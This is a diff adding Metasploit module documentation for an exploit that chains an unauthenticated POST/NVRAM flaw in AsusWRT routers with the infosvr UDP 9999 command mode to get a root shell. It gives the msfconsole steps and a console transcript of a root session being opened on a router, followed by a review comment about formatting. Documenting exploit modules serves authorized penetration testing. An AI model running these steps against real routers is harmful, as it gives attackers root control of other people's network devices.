| 1 | +## Description |
| 2 | + |
| 3 | + This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`. |
| 4 | + |
| 5 | + |
| 6 | +## Vulnerable Application |
| 7 | + |
| 8 | + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode. |
| 9 | + |
| 10 | + This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user. |
| 11 | + |
| 12 | + This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743. |
| 13 | + |
| 14 | + Numerous ASUS models are reportedly affected, but untested. |
| 15 | + |
| 16 | + |
| 17 | +## Verification Steps |
| 18 | + |
| 19 | + 1. Start `msfconsole` |
| 20 | + 2. `use exploits/linux/http/asuswrt_lan_rce` |
| 21 | + 3. `set RHOST [IP]` |
| 22 | + 4. `run` |
| 23 | + 5. You should get a *root* session |
| 24 | + |
| 25 | + |
| 26 | +## Options |
| 27 | + |
| 28 | + **ASUSWRTPORT** |
| 29 | + |
| 30 | + AsusWRT HTTP portal port (default: `80`) |
| 31 | + |
| 32 | + |
| 33 | +## Scenarios |
| 34 | +msf > use exploit/linux/http/asuswrt_lan_rce |
| 35 | +msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205 |
| 36 | +rhost => 192.168.132.205 |
| 37 | +msf exploit(linux/http/asuswrt_lan_rce) > run |
| 38 | + |
| 39 | +[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable. |
| 40 | +[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332 |
| 41 | +[+] 192.168.132.205:9999 - Success, shell incoming! |
| 42 | +[*] Found shell. |
| 43 | +[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600 |
| 44 | + |
| 45 | +id |
| 46 | +id |
| 47 | +/bin/sh: id: not found |
| 48 | +/ # cat /proc/cpuinfo |
| 49 | +cat /proc/cpuinfo |
| 50 | +system type : Broadcom BCM53572 chip rev 1 pkg 8 |
| 51 | +processor : 0 |
| 52 | +cpu model : MIPS 74K V4.9 |
| 53 | +BogoMIPS : 149.91 |
| 54 | +wait instruction : no |
| 55 | +microsecond timers : yes |
| 56 | +tlb_entries : 32 |
| 57 | +extra interrupt vector : no |
| 58 | +hardware watchpoint : yes |
| 59 | +ASEs implemented : mips16 dsp |
| 60 | +shadow register sets : 1 |
| 61 | +VCED exceptions : not available |
| 62 | +VCEI exceptions : not available |
| 63 | + |
| 64 | +unaligned_instructions : 0 |
| 65 | +dcache hits : 2147483648 |
| 66 | +dcache misses : 0 |
| 67 | +icache hits : 2147483648 |
| 68 | +icache misses : 0 |
| 69 | +instructions : 2147483648 |
| 70 | +/ # |
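Review bot: The `## Scenarios` transcript (from `msf > use exploit/linux/http/asuswrt_lan_rce` through the final `/ #` prompt) is not wrapped in a code fence, so the console output will render as run-together prose with the `[+]`/`[*]` prefixes lost; wrap it in a fenced block and add a one-line lead-in such as "Example run against an RT-AC68U:" to match the other module docs. Also, the module path is inconsistent between sections: `## Verification Steps` says `use exploits/linux/http/asuswrt_lan_rce` while the transcript uses `use exploit/linux/http/asuswrt_lan_rce`; only the singular `exploit/` form resolves in `msfconsole`. Finally, "Numerous ASUS models are reportedly affected, but untested." gives no source; add a `## References` section linking the advisory for the unauthenticated `POST` / NVRAM-set bug and the infosvr UDP 9999 command mode it chains with, and fix "a HTTP `POST`" to "an HTTP `POST`".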